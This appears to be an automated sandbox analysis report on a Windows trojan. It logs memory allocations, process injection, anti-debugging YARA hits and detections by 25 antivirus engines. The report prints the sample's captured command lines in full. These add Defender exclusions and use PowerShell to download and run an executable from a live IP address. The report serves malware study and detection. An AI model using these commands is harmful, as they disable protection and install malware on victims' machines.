NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05181000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00abb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0049e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00abc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 15872 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05da0400 process_handle: 0xffffffff		3221225550
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00abd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00abe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00abf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05f70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05f71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05da0178 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05da01a0 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05da01c8 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05da01f0 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05da0218 process_handle: 0xffffffff		3221225550
NtProtectVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 11 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05da459e process_handle: 0xffffffff		3221225550

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\vbc.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (5 events)

cmdline	powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force
cmdline	powershell "(New-Object System.Net.WebClient).DownloadFile('http://13.238.159.178/truth/svch.exe', (Join-Path -Path $env:AppData -ChildPath 'vbc.exe'))"
cmdline	powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force
cmdline	cmd /c powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & powershell "(New-Object System.Net.WebClient).DownloadFile('http://13.238.159.178/truth/svch.exe', (Join-Path -Path $env:AppData -ChildPath 'vbc.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'vbc.exe')" & exit
cmdline	powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'vbc.exe')"

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Roaming\vbc.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Roaming\vbc.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Sept. 15, 2021, 6:11 p.m.	thread_identifier: 2656 thread_handle: 0x00000038 process_identifier: 1816 current_directory: filepath: track: 1 command_line: cmd /c powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & powershell "(New-Object System.Net.WebClient).DownloadFile('http://13.238.159.178/truth/svch.exe', (Join-Path -Path $env:AppData -ChildPath 'vbc.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'vbc.exe')" & exit filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000003c	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 15, 2021, 6:11 p.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00052a00', u'virtual_address': u'0x00002000', u'entropy': 7.089089646127493, u'name': u'.text', u'virtual_size': u'0x00052994'}

entropy

7.08908964613

description

A section with a high entropy has been found

entropy

0.995481927711

description

Overall entropy of this PE file is high

URL downloaded by powershell script (1 event)

Data received

+*"}k*&{l+*&{m+*"}m*&{y+*"}y*&{z+*&{{+*"}{*&{|+*&{}+*&{~+*&{+*"}*&{+*"}*&{+*"}*&{+*"}*&{+*"}*&{+*&{+*"}*&{+*"}*&{+*&{+*"}*&{+*"}*&{+*"}*:{o` *ær\po#oß rúp(c {sY }{oð &*~(Q þEsR (S (2*&{+*"}*&{+*"}*&{+*"}*&{+*"}*&{+*"}*&{+*"}*&{+*"}*&{ +*"} *&{¡+*"}¡*fo9o5oYo´&*&{£+*"}£*&{¤+*"}¤*&{¥+*"}¥*&{¦+*"}¦*~(Q þosR (S (V*&{¬+*"}¬*&{+*"}*&{®+*"}®*&{¯+*"}¯*&{°+*"}°*&{±+*"}±*&{²+*"}²*&{³+*"}³*&{´+*"}´*&{µ+*"}µ*&{¶+*"}¶*&{·+*"}·*â(Q þwsR (S s¹ }»s¸ }¼(t*&{¹+*"}¹*~(Q þsR (S ({*&{¾+*"}¾*&{¿+*"}¿*&{À+*"}À*&{Á+*"}Á*&{Â+*"}Â*&{Ã+*"}Ã*&{Ä+*"}Ä*&{Å+*"}Å*&{Æ+*"}Æ*&{Ç+*"}Ç*&{È+*"}È*&{É+*"}É*&{Ê+*"}Ê*&{Ë+*"}Ë*&{Ì+*foooÊo9&*~(Q þ¬sR (S (*&{Î+*"}Î*&{Ï+*"}Ï*&{Ð+*"}Ð*&{Ñ+*"}Ñ*&{Ò+*"}Ò*&{Ó+*"}Ó*Âo¦o¢oÜo)&o¦o¢oÜo)&*â(Q þÁsR (S s¹ }Ýs1 }à(°*&{Õ+*"}Õ*&{Ö+*"}Ö*&{×+*"}×*&{Ø+*"}Ø*&{Ù+*"}Ù*&{Ú+*&{Û+

Poweshell is sending data to a remote host (1 event)

Data sent

GET /truth/svch.exe HTTP/1.1 Host: 13.238.159.178 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (6 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 15, 2021, 6:11 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 15, 2021, 6:11 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 15, 2021, 6:11 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 15, 2021, 6:11 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 15, 2021, 6:11 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 15, 2021, 6:11 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (2 events)

host	13.107.21.200
host	13.238.159.178

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2696 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000678	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:12 p.m.	process_identifier: 112 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000680		3221225496
NtAllocateVirtualMemory Sept. 15, 2021, 6:12 p.m.	process_identifier: 112 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000680	1	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Sept. 15, 2021, 6:11 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (2 events)

description	svch.exe tried to sleep 5456362 seconds, actually delayed analysis time by 5456362 seconds
description	vbc.exe tried to sleep 2728200 seconds, actually delayed analysis time by 2728200 seconds

Manipulates memory of a non-child process indicative of process injection (3 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1828 manipulating memory of non-child process 112
NtAllocateVirtualMemory Sept. 15, 2021, 6:12 p.m.	process_identifier: 112 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000680		3221225496	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:12 p.m.	process_identifier: 112 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000680	1	0	0

Potential code injection by writing to the memory of another process (9 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1828 injected into non-child 112
WriteProcessMemory Sept. 15, 2021, 6:11 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELàm0@@Ø^"<L"@.textØ `.rdata @@.bss0À base_address: 0x00400000 process_identifier: 2696 process_handle: 0x00000678	1	1	0
WriteProcessMemory Sept. 15, 2021, 6:11 p.m.	buffer: Uåì¸ @EüEüPèeÄEøE@Pè]ÄEôEMôÁ¸¸EðEðM9ÈDé Eð@EðëäEðMôÁEðUÂEðMìMøUè÷ùEüÐMè¾ ¾1ÑEìëÁEôÉÃUåìT¸DP¸PE¬PèÒÄ¸P¸PEðPèºÄ¸DE¬¸êP¸! @PèÿÿÿÄMðQM¬Q¹Q¹Q¹Q¹Q¹Q¹QP¸PèkøEðPèaEôPèX¸ÉÃUåì¸EüEüÁà¹0@Á¸0@9Á.EüÁ@EüÁá¸0@ÈEPEPEPMøEøÿÐÄë¸ÉÃUåì¸EüEüÁà¹0@Á¸0@9ÁEüHEüÁà¹0@ÁEøEøÿÐëÉÉÃUåìEPEPEPè>ÿÿÿÄX"@ \"@`"@EøPPEøPèdþÿÿÄEüèfÿÿÿEüÉÃUåìEEPPèBÄÉÂUåì¸P¸PEüPèÄ¸K@Pè¸PèÄ¸P¸PèÄX"@ \"@`"@EøEüP0@PRQEøPèáÄX"@ \"@`"@EøPPEøPèçþÿÿÄPè·ÄÉÃUåìX"@M\"@M¸P¸PèqÄX"@ \"@`"@EüPPEüPè'ýÿÿÄÉÃÿ%L"@ÿ%P"@ÿ%T"@ÿ%\|"@ÿ%"@ÿ%d"@ÿ%"@ÿ%h"@ÿ%l"@ÿ%p"@ÿ%t"@ base_address: 0x00401000 process_identifier: 2696 process_handle: 0x00000678	1	1	0
WriteProcessMemory Sept. 15, 2021, 6:11 p.m.	buffer: <+v!@u/!dkf-acn+h@>v!<3=34)xl@_FoQ_G`iLG]]YuMA L{D&]D L&H5MCOz]GUt\ .J#R%S AOJN6kQn]G\LzhNQlQJOQ5TF:/Q^ZORE{[D(2U] dAW^8^o)HO_z\OPQ ^L0S\S3JMKKnJ$kEqCmAQO%RHm0WBD +S%PYNDsQQKlOMg\"NCH/IORBY_Q6 7dK%[7Y@e 4}CiPZX]@V(/KEN!iHN [RoEV]wS5GEONOl<NCRmR@AXA]_dAW^*]%JHm}BMNlRI[#NDg\DMF]Y([FoG\A@(/_NR`XiH6LN"/WD[qKH[dH`NWz4_Q LAN-C,ZzUBKQW%TfUJY "Ì"L"¼"R#\|"×"à"é"ò"û"###.#;#K#_#p#~#×"à"é"ò"û"###.#;#K#_#p#~#msvcrt.dllstrlenmallocmemset__argc__argv_environ_XcptFilter__set_app_type_controlfp__getmainargsexitkernel32.dllCreateProcessACloseHandleSetUnhandledExceptionFilter base_address: 0x00402000 process_identifier: 2696 process_handle: 0x00000678	1	1	0
WriteProcessMemory Sept. 15, 2021, 6:11 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2696 process_handle: 0x00000678	1	1	0
WriteProcessMemory Sept. 15, 2021, 6:12 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELàm0@@Ø^"<L"@.textØ `.rdata @@.bss0À base_address: 0x000b0000 process_identifier: 112 process_handle: 0x00000680	1	1	0
WriteProcessMemory Sept. 15, 2021, 6:12 p.m.	buffer: Uåì¸ @EüEüPèeÄEøE@Pè]ÄEôEMôÁ¸¸EðEðM9ÈDé Eð@EðëäEðMôÁEðUÂEðMìMøUè÷ùEüÐMè¾ ¾1ÑEìëÁEôÉÃUåìT¸DP¸PE¬PèÒÄ¸P¸PEðPèºÄ¸DE¬¸êP¸! @PèÿÿÿÄMðQM¬Q¹Q¹Q¹Q¹Q¹Q¹QP¸PèkøEðPèaEôPèX¸ÉÃUåì¸EüEüÁà¹0@Á¸0@9Á.EüÁ@EüÁá¸0@ÈEPEPEPMøEøÿÐÄë¸ÉÃUåì¸EüEüÁà¹0@Á¸0@9ÁEüHEüÁà¹0@ÁEøEøÿÐëÉÉÃUåìEPEPEPè>ÿÿÿÄX"@ \"@`"@EøPPEøPèdþÿÿÄEüèfÿÿÿEüÉÃUåìEEPPèBÄÉÂUåì¸P¸PEüPèÄ¸K@Pè¸PèÄ¸P¸PèÄX"@ \"@`"@EøEüP0@PRQEøPèáÄX"@ \"@`"@EøPPEøPèçþÿÿÄPè·ÄÉÃUåìX"@M\"@M¸P¸PèqÄX"@ \"@`"@EüPPEüPè'ýÿÿÄÉÃÿ%L"@ÿ%P"@ÿ%T"@ÿ%\|"@ÿ%"@ÿ%d"@ÿ%"@ÿ%h"@ÿ%l"@ÿ%p"@ÿ%t"@ base_address: 0x000b1000 process_identifier: 112 process_handle: 0x00000680	1	1	0
WriteProcessMemory Sept. 15, 2021, 6:12 p.m.	buffer: <+v!@u/!dkf-acn+h@>v!<3=34)xl@_FoQ_G`iLG]]YuMA L{D&]D L&H5MCOz]GUt\ .J#R%S AOJN6kQn]G\LzhNQlQJOQ5TF:/Q^ZORE{[D(2U] dAW^8^o)HO_z\OPQ ^L0S\S3JMKKnJ$kEqCmAQO%RHm0WBD +S%PYNDsQQKlOMg\"NCH/IORBY_Q6 7dK%[7Y@e 4}CiPZX]@V(/KEN!iHN [RoEV]wS5GEONOl<NCRmR@AXA]_dAW^*]%JHm}BMNlRI[#NDg\DMF]Y([FoG\A@(/_NR`XiH6LN"/WD[qKH[dH`NWz4_Q LAN-C,ZzUBKQW%TfUJY "Ì"L"¼"R#\|"×"à"é"ò"û"###.#;#K#_#p#~#×"à"é"ò"û"###.#;#K#_#p#~#msvcrt.dllstrlenmallocmemset__argc__argv_environ_XcptFilter__set_app_type_controlfp__getmainargsexitkernel32.dllCreateProcessACloseHandleSetUnhandledExceptionFilter base_address: 0x000b2000 process_identifier: 112 process_handle: 0x00000680	1	1	0
WriteProcessMemory Sept. 15, 2021, 6:12 p.m.	buffer: base_address: 0x7efde008 process_identifier: 112 process_handle: 0x00000680	1	1	0

Code injection by writing an executable or DLL to the memory of another process (3 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1828 injected into non-child 112
WriteProcessMemory Sept. 15, 2021, 6:11 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELàm0@@Ø^"<L"@.textØ `.rdata @@.bss0À base_address: 0x00400000 process_identifier: 2696 process_handle: 0x00000678	1	1	0
WriteProcessMemory Sept. 15, 2021, 6:12 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELàm0@@Ø^"<L"@.textØ `.rdata @@.bss0À base_address: 0x000b0000 process_identifier: 112 process_handle: 0x00000680	1	1	0

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Sept. 15, 2021, 6:11 p.m.	buffer: GET /truth/svch.exe HTTP/1.1 Host: 13.238.159.178 Connection: Keep-Alive socket: 1436 sent: 78	1	78	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2648 called NtSetContextThread to modify thread in remote process 2696
Process injection	Process 1828 called NtSetContextThread to modify thread in remote process 112
NtSetContextThread Sept. 15, 2021, 6:11 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199021 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000674 process_identifier: 2696	1	0	0
NtSetContextThread Sept. 15, 2021, 6:12 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199021 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000067c process_identifier: 112	1	0	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"C:\Users\test22\AppData\Roaming\vbc.exe"
parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Roaming\vbc.exe

Attempts to remove evidence of file being downloaded from the Internet (2 events)

file	C:\Users\test22\AppData\Roaming\vbc.exe\:Zone.Identifier
file	C:\Users\test22\AppData\Local\Temp\svch.exe\:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2648 resumed a thread in remote process 2696
Process injection	Process 1828 resumed a thread in remote process 112
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000674 suspend_count: 1 process_identifier: 2696	1	0	0
NtResumeThread Sept. 15, 2021, 6:12 p.m.	thread_handle: 0x0000067c suspend_count: 1 process_identifier: 112	1	0	0

Creates a suspicious Powershell process (2 events)

value	Uses powershell to execute a file download from the command line
value	Uses powershell to execute a file download from the command line

File has been identified by 25 AntiVirus engines on VirusTotal as malicious (25 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Bulz.719574
FireEye	Gen:Variant.Bulz.719574
Cylance	Unsafe
Sangfor	Suspicious.Win32.Save.a
BitDefenderTheta	Gen:NN.ZemsilF.34142.um0@aWx0yMb
Cyren	W32/MSIL_Agent.CEU.gen!Eldorado
Symantec	MSIL.Packed.2
ESET-NOD32	a variant of MSIL/Kryptik.ACTT
APEX	Malicious
Kaspersky	Trojan.Win32.Vimditator.ajtv
BitDefender	Gen:Variant.Bulz.719574
Avast	Win32:PWSX-gen [Trj]
Ad-Aware	Gen:Variant.Bulz.719574
Emsisoft	Gen:Variant.Bulz.719574 (B)
Avira	HEUR/AGEN.1141554
Microsoft	Trojan:Win32/Wacatac.B!ml
GData	Gen:Variant.Bulz.719574
Cynet	Malicious (score: 99)
MAX	malware (ai score=88)
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/Androm.575E!tr
AVG	Win32:PWSX-gen [Trj]
CrowdStrike	win/malicious_confidence_100% (W)

Executed a process and injected code into it, probably while unpacking (50 out of 65 events)

Time & API	Arguments	Status	Return
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2648	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2648	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 2648	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x0000034c suspend_count: 1 process_identifier: 2648	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000614 suspend_count: 1 process_identifier: 2648	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x0000063c suspend_count: 1 process_identifier: 2648	1	0
NtGetContextThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x000000e4	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2648	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x0000065c suspend_count: 1 process_identifier: 2648	1	0
NtResumeThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000670 suspend_count: 1 process_identifier: 2648	1	0
CreateProcessInternalW Sept. 15, 2021, 6:11 p.m.	thread_identifier: 2572 thread_handle: 0x00000674 process_identifier: 2696 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\AddInProcess32.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\AddInProcess32.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\AddInProcess32.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000678	1	1
NtGetContextThread Sept. 15, 2021, 6:11 p.m.	thread_handle: 0x00000674	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2696 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000678	1	0
WriteProcessMemory Sept. 15, 2021, 6:11 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELàm0@@Ø^"<L"@.textØ `.rdata @@.bss0À base_address: 0x00400000 process_identifier: 2696 process_handle: 0x00000678	1	1
WriteProcessMemory Sept. 15, 2021, 6:11 p.m.	buffer: Uåì¸ @EüEüPèeÄEøE@Pè]ÄEôEMôÁ¸¸EðEðM9ÈDé Eð@EðëäEðMôÁEðUÂEðMìMøUè÷ùEüÐMè¾ ¾1ÑEìëÁEôÉÃUåìT¸DP¸PE¬PèÒÄ¸P¸PEðPèºÄ¸DE¬¸êP¸! @PèÿÿÿÄMðQM¬Q¹Q¹Q¹Q¹Q¹Q¹QP¸PèkøEðPèaEôPèX¸ÉÃUåì¸EüEüÁà¹0@Á¸0@9Á.EüÁ@EüÁá¸0@ÈEPEPEPMøEøÿÐÄë¸ÉÃUåì¸EüEüÁà¹0@Á¸0@9ÁEüHEüÁà¹0@ÁEøEøÿÐëÉÉÃUåìEPEPEPè>ÿÿÿÄX"@ \"@`"@EøPPEøPèdþÿÿÄEüèfÿÿÿEüÉÃUåìEEPPèBÄÉÂUåì¸P¸PEüPèÄ¸K@Pè¸PèÄ¸P¸PèÄX"@ \"@`"@EøEüP0@PRQEøPèáÄX"@ \"@`"@EøPPEøPèçþÿÿÄPè·ÄÉÃUåìX"@M\"@M¸P¸PèqÄX"@ \"@`"@EüPPEüPè'ýÿÿÄÉÃÿ%L"@ÿ%P"@ÿ%T"@ÿ%\|"@ÿ%"@ÿ%d"@ÿ%"@ÿ%h"@ÿ%l"@ÿ%p"@ÿ%t"@ base_address: 0x00401000 process_identifier: 2696 process_handle: 0x00000678	1	1
